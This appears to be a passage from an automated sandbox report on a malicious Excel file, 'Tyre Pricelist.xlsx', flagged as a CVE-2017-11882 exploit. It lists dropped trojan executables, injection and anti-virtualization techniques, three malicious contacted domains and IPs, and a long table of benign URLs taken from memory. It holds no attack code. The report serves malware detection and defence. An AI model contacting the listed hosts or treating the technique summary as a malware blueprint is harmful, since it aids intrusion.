Modifies the context of a thread in another process (thread injection) 20->72 74 Maps a DLL or memory area into another process 20->74 76 Sample uses process hollowing technique 20->76 78 Queues an APC in another process (thread injection) 20->78 27 explorer.exe 20->27 injected 80 Tries to detect virtualization through RDTSC time measurements 23->80 31 choice.exe 25->31         started        process11 dnsIp12 46 www.pestigenix.com 91.195.241.137, 49166, 80 SEDO-ASDE Germany 27->46 48 www.atlanticdentallab.com 180.215.92.80, 49167, 80 BCPL-SGBGPNETGlobalASNSG Singapore 27->48 84 System process connects to network (likely due to code injection or exploit) 27->84 33 NETSTAT.EXE 27->33         started        signatures13 process14 signatures15 58 Modifies the context of a thread in another process (thread injection) 33->58 60 Maps a DLL or memory area into another process 33->60 62 Tries to detect virtualization through RDTSC time measurements 33->62 36 cmd.exe 33->36         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Tyre Pricelist.xlsx27%VirustotalBrowse
          Tyre Pricelist.xlsx21%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%AviraTR/AD.Swotter.sxyuz
          C:\Users\Public\vbc.exe100%AviraTR/AD.Swotter.sxyuz
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%Joe Sandbox ML
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe33%ReversingLabsWin32.Trojan.Wacatac
          C:\Users\Public\vbc.exe33%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.2.vbc.exe.510000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.RegAsm.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.atlanticdentallab.com0%VirustotalBrowse
          workfinethdysanotherrainbowlomoyentthghf.ydns.eu4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%VirustotalBrowse
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://service2.bfast.com/0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.atlanticdentallab.com
          		180.215.92.80
          		truetrueunknown
          www.pestigenix.com
          		91.195.241.137
          		truetrue
            		unknown
            workfinethdysanotherrainbowlomoyentthghf.ydns.eu
            		103.125.191.5
            		truetrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              		high
              http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://search.ebay.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                		high
                http://www.mtv.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                  		high
                  http://www.rambler.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                    		high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                      		high
                      http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                        		high
                        http://buscar.ya.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                          		high
                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                            		high
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2196291605.0000000004B50000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                              		high
                              http://asp.usatoday.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://rover.ebay.comexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://search.ebay.in/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://msk.afisha.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://search.rediff.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://search.naver.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://www.google.ru/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://search.daum.net/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://buscar.ozu.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://search.about.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                		high
                                                                http://www.ask.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.cjmall.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://search.centrum.cz/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://suche.t-online.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.google.it/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://search.auction.co.kr/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.ceneo.pl/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.amazon.de/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2195836515.00000000041AD000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://sads.myspace.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://search.sify.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://search.ebay.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://search.nifty.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.google.si/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.google.cz/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.soso.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.univision.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://search.ebay.it/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://busca.orange.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://www.target.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://buscador.terra.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.iask.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://www.tesco.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://search.interpark.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              http://search.espn.go.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://p.zhongsou.com/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://service2.bfast.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.%s.comPAvbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		low
                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://it.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.ceneo.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://www.servicios.clarin.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                91.195.241.137
                                                                                                                                                		unknownGermany
                                                                                                                                                		47846SEDO-ASDEtrue
                                                                                                                                                103.125.191.5
                                                                                                                                                		unknownViet Nam
                                                                                                                                                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                                                                                                                                                180.215.92.80
                                                                                                                                                		unknownSingapore
                                                                                                                                                		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                Analysis ID:321115
                                                                                                                                                Start date:20.11.2020
                                                                                                                                                Start time:11:22:16
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 9m 54s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:Tyre Pricelist.xlsx
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@15/3@3/3
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 21.3% (good quality ratio 20.1%)
                                                                                                                                                • Quality average: 70.9%
                                                                                                                                                • Quality standard deviation: 28.9%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 78
                                                                                                                                                • Number of non-executed functions: 24
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
